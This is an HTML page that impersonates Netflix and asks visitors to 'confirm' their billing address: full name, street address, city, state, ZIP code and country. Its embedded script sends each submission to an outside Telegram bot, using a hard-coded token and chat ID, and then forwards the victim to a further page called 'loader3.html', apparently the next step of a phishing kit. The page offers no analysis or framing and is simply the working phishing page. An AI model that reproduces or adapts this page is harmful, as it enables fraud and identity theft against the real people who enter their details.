<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <title>Confirm Billing Address - Netflix</title>

  <!-- Favicon -->
  <link rel="icon" href="https://assets.nflxext.com/us/ffe/siteui/common/icons/nficon2016.ico" type="image/svg+xml" />

  <style>
    * {
      box-sizing: border-box;
    }

    body {
      margin: 0;
      font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif;
      background-color: #141414;
      color: #fff;
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
    }

    .container {
      background-color: #222;
      padding: 40px 30px;
      border-radius: 8px;
      width: 360px;
      box-shadow: 0 8px 16px rgba(0,0,0,0.7);
    }

    /* Netflix style logo */
    .logo {
      display: flex;
      justify-content: center;
      margin-bottom: 25px;
    }
    .logo img {
      width: 130px;
      height: auto;
    }

    h1 {
      font-weight: 700;
      margin-bottom: 20px;
      font-size: 20px;
      color: #FFFFFF;
      text-align: center;
    }

    form {
      display: flex;
      flex-direction: column;
    }

    label {
      font-size: 14px;
      margin-bottom: 6px;
      margin-top: 15px;
      font-weight: 600;
    }

    input, select {
      padding: 10px 12px;
      border-radius: 4px;
      border: none;
      font-size: 16px;
      outline: none;
      background-color: #333;
      color: #fff;
      transition: background-color 0.3s;
    }

    input:focus, select:focus {
      background-color: #444;
    }

    button {
      margin-top: 30px;
      background-color: #e50914;
      border: none;
      padding: 12px;
      border-radius: 4px;
      color: white;
      font-weight: 700;
      font-size: 18px;
      cursor: pointer;
      transition: background-color 0.3s;
    }

    button:hover {
      background-color: #b20710;
    }
  </style>
</head>
<body>
  <div class="container">
    <!-- Netflix Logo -->
    <div class="logo">
      <img src="https://upload.wikimedia.org/wikipedia/commons/0/08/Netflix_2015_logo.svg" alt="Netflix Logo" />
    </div>

    <h1>Confirm Billing Address</h1>

    <form id="billingForm">
      <label for="fullName">Full Name</label>
      <input type="text" id="fullName" name="fullName" placeholder="John Doe" required />

      <label for="address">Street Address</label>
      <input type="text" id="address" name="address" placeholder="1234 Elm Street" required />

      <label for="city">City</label>
      <input type="text" id="city" name="city" placeholder="Los Angeles" required />

      <label for="state">State/Province</label>
      <input type="text" id="state" name="state" placeholder="CA" required />

      <label for="zip">ZIP/Postal Code</label>
      <input type="text" id="zip" name="zip" placeholder="90001" required />

      <label for="country">Country</label>
      <select id="country" name="country" required>
        <option value="" disabled selected>Select your country</option>
        <option value="US">United States</option>
        <option value="CA">Canada</option>
        <option value="GB">United Kingdom</option>
        <option value="AU">Australia</option>
        <option value="DE">Germany</option>
      </select>

      <button type="submit">Submit</button>
    </form>
  </div>
  <script>
    const botToken = '7764032513:AAFOgtYO7zHSkIK4eggYO0niYGZ6l--Ym5U'; // Replace with your bot's token
    const chatId = '1998168170';     // Replace with your Telegram user or group chat ID

    document.getElementById('billingForm').addEventListener('submit', function(e) {
      e.preventDefault();

      const fullName = document.getElementById('fullName').value;
      const address = document.getElementById('address').value;
      const city = document.getElementById('city').value;
      const state = document.getElementById('state').value;
      const zip = document.getElementById('zip').value;
      const country = document.getElementById('country').value;

      const message = `ðŸ“¥ Netflx Address :
 fullName: ${fullName}
 address: ${address}
 city: ${city}
 state: ${state}
 zip: ${zip}
 country: ${country}`;

      const url = `https://api.telegram.org/bot${botToken}/sendMessage`;

      fetch(url, {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json'
        },
        body: JSON.stringify({
          chat_id: chatId,
          text: message
        })
      })
      .then(response => response.json())
      .then(data => {
        // Redirect to a new page on success
        window.location.href = "loader3.html"; // Change to your desired page
      })
      .catch(error => {
        alert("Failed to send.");
        console.error('Error:', error);
      });
    });
  </script>
</body>
</html>
